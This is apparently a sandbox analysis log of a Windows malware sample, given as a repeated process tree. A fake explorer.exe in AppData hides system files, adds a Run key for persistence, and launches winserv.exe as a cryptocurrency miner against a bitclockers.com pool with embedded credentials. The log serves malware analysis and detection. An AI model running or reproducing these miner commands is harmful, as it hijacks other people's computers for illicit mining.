C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4196
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5984 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵
- System Location Discovery: System Language Discovery
PID:2200
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3388
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5944
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:4916 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:732
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1028
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4540
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:5508 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4552
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵
- System Location Discovery: System Language Discovery
PID:1940
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5720
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:2516 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:5076
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵
- System Location Discovery: System Language Discovery
PID:5724
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3764
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:1980 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2540
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:6072
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5180
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:4400 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1328
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵
- System Location Discovery: System Language Discovery
PID:1604
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5784
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:4556 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4748
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵
- System Location Discovery: System Language Discovery
PID:4936
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:840
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:760 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵
- System Location Discovery: System Language Discovery
PID:4308
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵
- System Location Discovery: System Language Discovery
PID:1904
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2288
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:2604 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵
- System Location Discovery: System Language Discovery
PID:4336
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵
- System Location Discovery: System Language Discovery
PID:3768
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3432
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
PID:3748 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2768
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5892
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5288
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Adds Run key to start application
PID:3760 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2356
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3164
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5332
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Adds Run key to start application
PID:4428 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3204
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1680
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:716
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:6124
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:5304
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2340
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5492
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:552
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:5320
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1816
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1460
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:744
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:5988
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2784
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5712
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:5844
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:5820
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5680
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1276
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:5732
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2952
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2388
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2256
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:1028
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3864
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2248
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1224
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:1940
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:5724
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4860
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:400
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3872
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:5960
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4884
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4668
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2540
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3552
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:6068
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5864
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:5612
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3168
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5848
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5168
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4888
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1556
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3360
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4332
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:244
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:5764
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5516
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1836
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:5428
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4960
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3404
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3640
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3184
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:5296
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1724
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5568
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3840
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:5332
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1728
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4572
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2572
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2640
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5172
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2084
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4852
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1688
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2016
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5652
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:688
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2136
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:112
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1036
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:5356
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3556
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5820
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:784
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:5900
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:5224
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4196
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5232
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:1424
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3924
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2256
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:6076
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:1984
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4976
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2664
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2412
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3292
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:5740
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1412
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1372
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4400
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:340
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5016
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5672
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4924
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:5896
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5800
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4292
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4904
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1556
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5072
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3168
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:940
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:840
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4496
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1768
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4984
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4900
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1640
-
-
-
